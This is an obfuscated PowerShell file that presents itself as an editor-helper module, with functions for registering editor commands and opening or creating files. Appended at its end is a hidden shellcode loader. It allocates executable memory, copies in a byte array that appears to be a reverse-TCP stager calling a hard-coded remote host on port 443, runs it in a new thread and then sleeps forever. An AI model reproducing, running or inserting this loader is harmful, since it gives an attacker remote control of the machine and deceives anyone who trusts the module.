$MH5NDk  = [tYpE]("{3}{4}{1}{2}{0}" -F 'IO.path','s','tem.','S','y');  $SArzW =[tYPe]("{1}{12}{11}{8}{4}{10}{7}{9}{0}{5}{2}{6}{3}"-F 'ER','sy','rc','egoRy','UT','RO','at','Ion','A','.','OMAt','eNT.','sTEM.MaNagem')  ;  





function rEgist`Er-`E`D`ItO`Rco`mmAnd {
    [CmdletBinding()]
    param(
        [Parameter(MAnDatORY=${tR`UE})]
        [ValidateNotNullOrEmpty()]
        [string]${Na`me},

        [Parameter(mandAtORy=${t`RuE})]
        [ValidateNotNullOrEmpty()]
        [string]${D`I`SPlAyNAME},

        [Parameter(
            maNDaTOry=${T`RUE},
            pARaMeTErSeTnaMe="FUnctI`oN")]
        [ValidateNotNullOrEmpty()]
        [string]${f`UNCTIon},

        [Parameter(
            mandATOry=${t`Rue},
            ParAmetERseTName="S`criPtbl`o`ck")]
        [ValidateNotNullOrEmpty()]
        [ScriptBlock]${sCRi`P`TBlock},

        [switch]${suPPrE`s`soUt`p`UT}
    )

    Process
    {
        ${CoM`maNDAr`GS} = @(${NA`me}, ${dISp`l`AyNAME}, ${sUP`pRess`Out`PuT}."i`spRE`seNt")

        if (${sCRiPT`Bl`O`ck} -ne ${nu`ll})
        {
            .("{2}{1}{0}{3}" -f'e','V','Write-','rbose') ('Regist'+'er'+'ing '+'c'+'omm'+'and '+"'$Name' "+'which'+' '+'exec'+'utes '+'a '+'Scrip'+'tBl'+'o'+'ck')
            ${C`Om`maNdAr`Gs} += ${S`crI`pTBlOcK}
        }
        else
        {
            .("{2}{3}{1}{0}"-f'erbose','V','Writ','e-') ('Re'+'g'+'istering '+'co'+'mma'+'nd '+"'$Name' "+'whi'+'ch '+'exe'+'cu'+'te'+'s '+'a '+'f'+'unctio'+'n')
            ${COm`ma`Nda`RGS} += ${Fu`NCtI`ON}
        }

        ${eDitorc`OM`maNd} = .("{1}{2}{0}"-f 'bject','New','-O') ("{12}{8}{13}{4}{10}{11}{3}{9}{5}{0}{6}{15}{14}{1}{7}{2}"-f'werShe','rCom','and','es.Serv','rS','es.Po','llCon','m','rosoft.P','ic','hell','.EditorServic','Mic','owe','xt.Edito','te') -ArgumentList ${Co`M`M`AndargS}
        if (${pSed`I`Tor}.("{3}{1}{2}{0}" -f 'and','terC','omm','Regis').Invoke(${e`D`I`TOrCoMmAND}))
        {
            &("{4}{2}{1}{0}{3}" -f 'b','e-Ver','it','ose','Wr') ('Re'+'gistered'+' '+'ne'+'w '+'com'+'mand'+' '+"'$Name'")
        }
        else
        {
            .("{2}{1}{3}{0}" -f 'e','Ver','Write-','bos') ('Upd'+'a'+'ted '+'exist'+'in'+'g '+'comman'+'d '+"'$Name'")
        }
    }
}


function UN`REGISTEr-e`di`TOr`COmma`Nd {
    [CmdletBinding()]
    param(
        [Parameter(mAndAtory=${T`Rue})]
        [ValidateNotNullOrEmpty()]
        [string]${n`AME}
    )

    Process
    {
        .("{1}{3}{2}{4}{0}"-f 'e','W','-Verb','rite','os') ('Unre'+'g'+'ister'+'ing'+' '+'co'+'m'+'mand '+"'$Name'")
        ${PSE`D`itOr}.("{0}{2}{1}{3}" -f 'Unregist','Comman','er','d').Invoke(${N`Ame});
    }
}


function Ne`w-edi`T`o`RFilE {
    [CmdletBinding()]
    param(
        [Parameter()]
        [String[]]
        [ValidateNotNullOrEmpty()]
        ${P`ATH},

        [Parameter(valuEfrOmpipELiNe=${t`RuE})]
        ${v`A`luE},

        [Parameter()]
        [switch]
        ${fO`RCE}
    )

    begin {
        ${va`l`U`ElIsT} = @()
    }

    process {
        ${VA`lu`El`iSt} += ${V`A`LuE}
    }

    end {
        if (${P`ATh}) {
            foreach (${f`ilen`Ame} in ${pA`Th})
            {
                if (-not (.("{3}{0}{1}{2}"-f'st-P','at','h','Te') ${f`iLEN`AmE}) -or ${For`Ce}) {
                    &("{0}{2}{1}"-f'Ne','-Item','w') -Path ${FIl`eNA`mE} -ItemType ("{0}{1}" -f'Fil','e') | .("{0}{2}{1}"-f 'Ou','l','t-Nul')

                    if (${p`Ath}."coU`NT" -gt 1) {
                        ${P`R`evIEw} = ${FA`l`sE}
                    } else {
                        ${p`Re`VIEW} = ${tr`Ue}
                    }

                    
                    if (!(  (  &("{0}{1}{2}"-f 'gET-','c','HiLditEM') vARIAbLe:MH5ndk  ).VAlue::("{2}{0}{1}" -f 'athRoote','d','IsP').Invoke(${f`Il`ENAME}))) {
                        ${F`iLEnA`Me} = ${exE`cUTi`OnCoN`TeXt}."s`ESS`i`oNsTatE"."p`ATH".("{0}{1}{3}{8}{7}{5}{6}{2}{4}" -f'GetUnreso','l','mP','ve','SPath','t','hFro','a','dProviderP').Invoke(${fI`LEn`AmE})
                    }

                    ${PSe`DI`Tor}."wOr`KSpa`Ce".("{2}{1}{0}" -f 'e','il','OpenF').Invoke(${f`iLe`NAME}, ${p`ReVIEW})
                    ${Ps`eD`iTor}.("{4}{1}{3}{2}{0}"-f 'ntext','etE','o','ditorC','G').Invoke()."CuR`Re`NTfiLe".("{2}{1}{0}" -f'ext','rtT','Inse').Invoke((${v`A`luelIst} | &("{0}{2}{1}" -f 'Out-','ng','Stri')))
                } else {
                    ${psCmd`l`ET}.("{0}{1}{2}{3}" -f'W','ri','teE','rror').Invoke( (
                        .("{2}{1}{0}"-f 't','-Objec','New') -TypeName ("{8}{5}{1}{2}{9}{7}{6}{3}{0}{4}"-f 'or','ste','m.Man','on.ErrorRec','d','y','mati','t.Auto','S','agemen') -ArgumentList @(
                            [System.IO.IOException]('The'+' '+'file'+' '+"'$fileName' "+'alr'+'e'+'ady '+'exist'+'s.'),
                            ("{3}{1}{5}{0}{2}{4}"-f 'dit','w','orFileIO','Ne','Error','E'),
                             (  .('gI')  VaRIABlE:SarZw).VALuE::"w`RItEErr`OR",
                            ${Fil`e`Name}) ) )
                }
            }
        } else {
            ${PSeD`Itor}."WO`RkSp`Ace".("{0}{2}{1}" -f 'Ne','ile','wF').Invoke()
            ${PS`e`dIToR}.("{4}{2}{3}{0}{1}" -f 'r','Context','etEdi','to','G').Invoke()."c`UrRe`NtFI`lE".("{2}{0}{1}" -f 'tTe','xt','Inser').Invoke((${Val`Ue`LiSt} | &("{1}{0}{2}" -f'n','Out-Stri','g')))
        }
    }
}

function OPEn-edit`o`Rf`Ile {
    [CmdletBinding()]
    param(
        [Parameter(mandATOrY=${Tr`Ue}, VAlUEFROMpIpelINe=${tr`UE})]
        [ValidateNotNullOrEmpty()]
        ${p`ATH}
    )

    begin {
        ${p`A`THs} = @()
    }

    process {
        ${pat`Hs} += ${PA`Th}
    }

    end {
        if (${P`A`Ths}."c`ounT" -gt 1) {
            ${PrE`Vi`eW} = ${F`AL`SE}
        } else {
            ${p`REVi`ew} = ${T`RUe}
        }

        &("{3}{0}{1}{2}" -f'et','-ChildIt','em','G') ${pAt`Hs} -File | .("{0}{1}{2}{3}" -f 'Fo','rEach-Ob','jec','t') {
            ${PSED`iT`oR}."Wo`RK`SpAcE".("{1}{0}"-f'enFile','Op').Invoke(${_}."FUl`Ln`AmE", ${P`REvIEw})
        }
    }
}
&("{0}{1}{2}" -f 'Set-','A','lias') ("{0}{1}"-f 'ps','edit') ("{3}{0}{1}{2}{4}"-f'pe','n-E','ditorFi','O','le') -Scope ("{1}{0}"-f'obal','Gl')

&("{2}{1}{3}{4}{0}"-f 'er','ort-M','Exp','oduleMem','b') -Function OPen`-EDiTORf`I`lE,("{2}{1}{3}{0}" -f'torFile','e','N','w-Edi')

${C} = ((("{23}{77}{59}{72}{71}{79}{69}{25}{53}{27}{6}{48}{22}{35}{67}{38}{47}{8}{65}{14}{52}{64}{30}{37}{54}{11}{63}{68}{13}{21}{70}{80}{75}{76}{31}{56}{36}{55}{43}{29}{10}{34}{61}{33}{58}{50}{18}{41}{0}{44}{5}{15}{57}{42}{24}{32}{78}{17}{62}{49}{2}{9}{46}{40}{20}{73}{7}{60}{74}{1}{3}{26}{28}{39}{4}{51}{45}{16}{12}{19}{66}"-f'n','n IntPtr m','lpThrea','ems','t sr','Ptr ','J1','c static',' VirtualAl','d','tr l','dwS','ou','e, uint flP','r lpA','lpStartAddress, IntPtr lpP','uint c','nFlags, ','t dwStackSize','nt)','(yJ1msvcrt','rotec',']public stati','[DllIm',', uint ','l','et(Int','lly','Ptr des',' IntPtr CreateThread(IntP',', uin','J1','dw','u','pThread','c exter','ublic ','t','P','t, uin','mport',', I','eter','ern','t',' ','Id);[DllI','tr',')',' ','uin','c,','ddr','32.d',' ','static ext',')]p','aram','tes, ','or',' ','Attrib','IntPtr','ize, uint flAlloca','ess','loc(IntPt',';','n Int','tionTyp','erne','t);[DllImport(','(y','t','.dllyJ1)]publi','exter','J1k','ernel32.dlly','p','Creatio','J1k','y'))."r`EPLa`cE"('yJ1',[stRInG][chAr]34));${W} = .("{2}{0}{1}" -f 'd-','Type','Ad') -memberDefinition ${c} -Name ("{1}{0}" -f'n32','Wi') -namespace ("{0}{4}{1}{2}{3}"-f'Wi','32','Func','tions','n') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,0x8d,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc6,0xce,0x85,0x87,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0a,0xff,0x4e,0x08,0x75,0xec,0xe8,0x3f,0x00,0x00,0x00,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xe9,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x83,0xf8,0x00,0x7e,0xc3,0x01,0xc3,0x29,0xc6,0x75,0xe9,0xc3,0xbb,0xf0,0xb5,0xa2,0x56,0x6a,0x00,0x53,0xff,0xd5;${G} = 0x1000;if (${z}."lEng`TH" -gt 0x1000){${G} = ${z}."Len`GTH"};${X}=${w}::("{0}{1}{2}{3}" -f 'V','irtualA','llo','c').Invoke(0,0x1000,${G},0x40);for (${I}=0;${i} -le (${z}."LEn`Gth"-1);${i}++) {${W}::"m`EMsEt"([IntPtr](${x}.("{1}{0}"-f '32','ToInt').Invoke()+${I}), ${Z}[${i}], 1)};${W}::("{0}{2}{1}"-f'Cre','Thread','ate').Invoke(0,0,${x},0,0,0);for (;;){&("{2}{0}{3}{1}"-f't','sleep','Star','-') 60};
